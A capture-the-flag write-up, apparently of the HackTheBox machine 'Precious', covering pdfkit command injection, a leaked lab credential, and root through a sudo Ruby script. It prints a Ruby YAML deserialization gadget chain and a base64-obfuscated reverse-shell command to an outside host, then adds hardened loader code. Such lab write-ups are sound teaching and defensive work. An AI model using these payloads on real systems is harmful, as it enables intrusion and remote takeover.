Enumeration
Start with an Nmap scan.
nmap -sC -sV 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-01 01:06 EDT
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| 256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_ 256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.35 seconds
The SSH port and a web server are open.
However, Nmap could not follow the redirect to the domain name. Let’s add it to the hosts file.
echo "10.10.11.189 precious.htb" | sudo tee -a /etc/hosts
Now, let’s visit the web page and see how it looks.
It’s a file conversion web page.
I ran the Nmap scan again since we added the domain to the /etc/hosts file.
80/tcp open http nginx 1.18.0
|_http-title: Convert Web Page to PDF
| http-server-header:
| nginx/1.18.0
|_ nginx/1.18.0 + Phusion Passenger(R) 6.0.15
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We’ve got more information about the web server: it is fronted by Phusion Passenger.
And if you look at the response header, you can see that it’s using Ruby.
I tried inputting many web pages to convert to PDF, but they all failed.
So, I created a test HTML file and opened a web server on my server.
Then, I managed to convert the file.
The target web page output a file, so I checked the file’s metadata.
The file was converted using the pdfkit tool.
User flag
Since I knew the version of the tool, I searched for vulnerabilities.
https://github.com/UNICORDev/exploit-CVE-2022-25765
I found the GitHub page above.
I managed to get a reverse shell using the tool.
But we are not allowed to read the user’s flag yet due to permission issues.
I enumerated directories to find some credential information.
I discovered the user henry’s credentials under /home/ruby/.bundle.
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"
After switching user, I found the flag in henry’s home directory.
Root flag
For privilege escalation, I checked the sudo list first.
/usr/bin/ruby /opt/update_dependencies.rb
We can execute this file with the sudo command.
Let’s check the script.
It loads the dependencies.yml file.
Now it’s quite obvious what to do.
I want to write reverse shell code in that file. But the problem is, I don’t have write permission!
The file path is relative, not absolute, meaning the script looks for dependencies.yml in the current working directory, so we can try creating the file in a different directory.
After some googling, I learned that anyone can create a file in the /tmp and /var/tmp directories. These directories are world-writable.
Ok, so my plan is to create dependencies.yml in the /tmp directory and run it using the sudo command.
To do that, I prepared a Ruby deserialization payload.
You can find it here.
---
- !ruby/object:Gem::Installer
  i: x
- !ruby/object:Gem::SpecFetcher
  i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
        read: 0
        header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
        socket: &1 !ruby/object:Gem::RequestSet
          sets: !ruby/object:Net::WriteAdapter
            socket: !ruby/module 'Kernel'
            method_id: :system
          git_set: id
        method_id: :resolve
If we run the script with the YAML above in place, we get the result below.
The id command is executed. So let’s put a reverse shell command in git_set.
git_set: echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNS82NjY2IDA+JjE=|base64 -d| bash
The trick is to pass the payload base64-encoded, let the system decode it, and finally execute it with bash.
Run the sudo command and we are in as root.
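As an added defensive example (my own code, not the machine's update_dependencies.rb, which this writeup does not reproduce), here is how a sudo-run dependency loader could be written so that neither trick above works: YAML.safe_load refuses !ruby/object tags and anchors, and the file is read only from an absolute, root-owned path. The path /opt/dependencies.yml, the function names and the sample YAML are assumptions.

```ruby
require 'yaml'
# Assumed vulnerable pattern (Psych < 4, Ruby <= 3.0): YAML.load resolves
# !ruby/object tags and anchors, so a crafted dependencies.yml can build
# the gadget chain shown above. Psych 4 moved this to YAML.unsafe_load.
def load_dependencies_unsafe(yaml_text)
  YAML.load(yaml_text)
end

# Hardened parser: safe_load builds only plain Hash/Array/String/Numeric
# values and raises Psych::DisallowedClass on any !ruby/object tag; aliases
# are off, so the &1 anchors the chain relies on are rejected as well.
# The shape check then accepts nothing but "gem name => version" strings.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, 'expected a mapping of gem => version' unless data.is_a?(Hash)
  data.each do |gem, version|
    next if gem.is_a?(String) && version.is_a?(String)
    raise ArgumentError, "bad entry #{gem.inspect} => #{version.inspect}"
  end
  data
end

# True when the hardened parser refuses the input as a deserialization gadget.
def rejected_as_gadget?(yaml_text)
  parse_dependencies(yaml_text)
  false
rescue Psych::DisallowedClass
  true
end

# A script run via sudo must not open a relative path: it resolves against
# the caller's cwd, which is why dropping the file in world-writable /tmp
# worked. Require an absolute, root-owned, non-group/world-writable file.
def trusted_dependency_file?(path)
  return false unless path.start_with?('/')
  st = File.stat(path)
  st.file? && st.uid.zero? && (st.mode & 0o022).zero?
rescue SystemCallError
  false
end

# Assumed location; the writeup only gives the bare relative name.
def load_dependencies(path = '/opt/dependencies.yml')
  raise SecurityError, "refusing to read #{path}" unless trusted_dependency_file?(path)
  parse_dependencies(File.read(path))
end
# Constructed sample inputs (not taken from the machine).
BENIGN_YAML = "examplegem: 1.0.0\nothergem: 2.3.4\n".freeze
TAGGED_YAML = "---\n- !ruby/object:Gem::Installer\n  i: x\n".freeze
```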
Learning
Through this machine, I learned two new things.
- The /tmp directory is world-writable. Since anyone can write a file there, it can be very useful (and dangerous).
- Base64-encoded payloads. By passing the encoded payload, I can avoid whitespace and hide the content.